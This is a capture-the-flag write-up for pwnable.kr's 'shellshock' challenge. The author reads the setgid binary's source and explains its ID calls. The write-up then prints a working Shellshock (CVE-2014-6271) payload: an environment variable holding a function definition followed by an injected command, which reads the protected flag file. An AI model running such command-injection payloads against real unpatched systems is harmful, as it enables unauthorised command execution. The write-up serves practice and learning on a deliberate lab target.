Pwnable.kr - shellshock


Today I’m going to show you how to exploit a vulnerability in shellschock challenge from pwnable.kr.

Solution

Firstly we’ll have to connect via ssh to the server hosting this challenge.

main:~ > ssh [email protected] -p2222
[email protected] password:
____ __ __ ____ ____ ____ _ ___ __ _ ____
| \| |__| || \ / || \ | | / _] | |/ ]| \
| o ) | | || _ || o || o )| | / [_ | ' / | D )
| _/| | | || | || || || |___ | _] | \ | /
| | | ` '
|| | || _ || O || || [_ __ | \| \
| | \ / | | || | || || || || || . || . \
|__| \_/\_/ |__|__||__|__||_____||_____||_____||__||__|\_||__|\_|

- Site admin : [email protected]
- IRC : irc.netgarage.org:6667 / #pwnable.kr
- Simply type "irssi" command to join IRC now
- files under /tmp can be erased anytime. make your directory under /tmp
- to use peda, issue `source /usr/share/peda/peda.py` in gdb terminal
Last login: Fri Jan 19 07:08:33 2018 from 46.164.98.87
[email protected]:~$ ls -la
total 980
drwxr-x--- 5 root shellshock 4096 Oct 23 2016 .
drwxr-xr-x 87 root root 4096 Dec 27 23:17 ..
-r-xr-xr-x 1 root shellshock 959120 Oct 12 2014 bash
d--------- 2 root root 4096 Oct 12 2014 .bash_history
-r--r----- 1 root shellshock_pwn 47 Oct 12 2014 flag
dr-xr-xr-x 2 root root 4096 Oct 12 2014 .irssi
drwxr-xr-x 2 root root 4096 Oct 23 2016 .pwntools-cache
-r-xr-sr-x 1 root shellshock_pwn 8547 Oct 12 2014 shellshock
-r--r--r-- 1 root root 188 Oct 12 2014 shellshock.c

From now on, we’re ready to play with the challenge. First thing I notice is that flag is only accessible by user shellshock_pwn, other than my user called shellshock. But luckily, the binary is also using shellshock_pwn GID. Then, following my usual steps, I decide to check out the source code.

#include <stdio.h>
int main(){
setresuid(getegid(), getegid(), getegid());
setresgid(getegid(), getegid(), getegid());
system("/home/shellshock/bash -c 'echo shock_me'");
return 0;
}

In order to check what setresgid, setresuid and getegid are I decided to look at the man pages for these functions. Here’s the quick walkthrough.

setresuid() sets the real user ID, the effective user ID, and the
saved set-user-ID of the calling process.

An unprivileged process may change its real UID, effective UID,
and saved set-user-ID, each to one of: the current real UID, the
current effective UID or the current saved set-user-ID.

A privileged process (on Linux, one having the CAP_SETUID capa‐
bility) may set its real UID, effective UID, and saved set-user-
ID to arbitrary values.

If one of the arguments equals -1, the corresponding value is not
changed

Completely analogously, setresgid() sets the real GID, effective
GID, and saved set-group-ID of the calling process (and always
modifies the filesystem GID to be the same as the effective GID),
with the same restrictions for unprivileged processes.
The getegid() function shall return the effective group ID of the
calling process

In the other words, this program will run with the group ID of the owner, which is shellshock_pwn. Just as the ID of the flag. That’s good news.

Now let’s look at the challenge name once again. Shellshock is the name of the vulnerability disclosed on 24 September 2014. It allows an attacker to execute arbitrary commands on the vulnerable versions of bash.

Vulnerability can be tested with the following command.

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

We can use the snippet to perform our own shellshock on this vulnerable binary. Firstly, let’s modify this command to view the flag for us.

export x="() { :;}; /bin/cat flag "

Export is only used to save the variable, and then run the binary - just like that.

[email protected]:~$ export x="() { :;}; /bin/cat flag "
[email protected]:~$ ./shellshock
only if I knew CVE-2014-6271 ten years ago..!!
Segmentation fault

Tools used

No external tools used.

Reference/notes

https://en.wikipedia.org/wiki/Shellshock_software_bug

https://www.owasp.org/images/1/1b/Shellshock_-_Tudor_Enache.pdf

http://seclists.org/oss-sec/2014/q3/650

https://blog.cloudflare.com/inside-shellshock/

Keep learning and stay safe! ~ W3ndige